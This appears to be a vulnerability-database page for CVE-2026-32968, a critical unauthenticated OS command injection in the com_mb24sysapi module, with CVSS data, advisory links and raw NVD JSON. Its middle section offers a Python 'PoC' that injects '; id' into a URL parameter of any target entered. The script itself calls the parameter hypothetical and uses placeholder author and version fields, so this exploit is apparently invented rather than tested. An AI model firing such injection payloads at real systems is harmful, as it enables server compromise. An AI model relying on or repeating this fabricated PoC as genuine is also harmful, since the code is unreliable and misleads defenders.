CVE-2026-32968

Description

Due to the improper neutralisation of special elements used in an OS command, an unauthenticated remote attacker can exploit an RCE vulnerability in the com_mb24sysapi module, resulting in full system compromise. This vulnerability is a variant attack for CVE-2020-10383.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

com_mb24sysapi (具体受影响版本请参考 VDE-2026-024/025 公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit Title: PoC for CVE-2026-32968 (OS Command Injection in com_mb24sysapi)
# Date: 2026-03-23
# Exploit Author: Security Researcher
# Vendor Homepage: Target Vendor
# Version: Vulnerable Versions
# Tested on: Linux/Unix

def exploit(target_url):
    """
    Demonstrates the OS Command Injection vulnerability in com_mb24sysapi.
    """
    # The vulnerable endpoint parameter (hypothetical based on module structure)
    injection_point = "param"
    # Payload to execute 'id' command on the server
    payload = "; id"

    full_url = f"{target_url}/index.php?option=com_mb24sysapi&{injection_point}={payload}"

    try:
        response = requests.get(full_url, timeout=10)
        print(f"[+] Request sent to: {full_url}")
        print(f"[+] Status Code: {response.status_code}")
        print("[+] Response Body:")
        print(response.text)
        
        if "uid=" in response.text:
            print("[!] Command Injection Successful!")
        else:
            print("[-] Command Injection Failed or output not visible.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = input("Enter target URL (e.g., http://localhost): ")
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32968
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32968
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32968/
[4] VulDB https://vuldb.com/cve/CVE-2026-32968
[5] https://certvde.com/de/advisories/VDE-2026-024
[6] https://certvde.com/de/advisories/VDE-2026-025

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32968", "sourceIdentifier": "[email protected]", "published": "2026-03-23T12:16:08.407", "lastModified": "2026-03-23T14:31:37.267", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to the improper neutralisation of special elements used in an OS command, an unauthenticated remote attacker can exploit an RCE vulnerability in the com_mb24sysapi module, resulting in full system compromise. This vulnerability is a variant attack for CVE-2020-10383."}, {"lang": "es", "value": "Debido a la neutralización incorrecta de elementos especiales utilizados en un comando del SO, un atacante remoto no autenticado puede explotar una vulnerabilidad RCE en el módulo com_mb24sysapi, resultando en un compromiso total del sistema. Esta vulnerabilidad es un ataque variante para CVE-2020-10383."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://certvde.com/de/advisories/VDE-2026-024", "source": "[email protected]"}, {"url": "https://certvde.com/de/advisories/VDE-2026-025", "source": "[email protected]"}]}}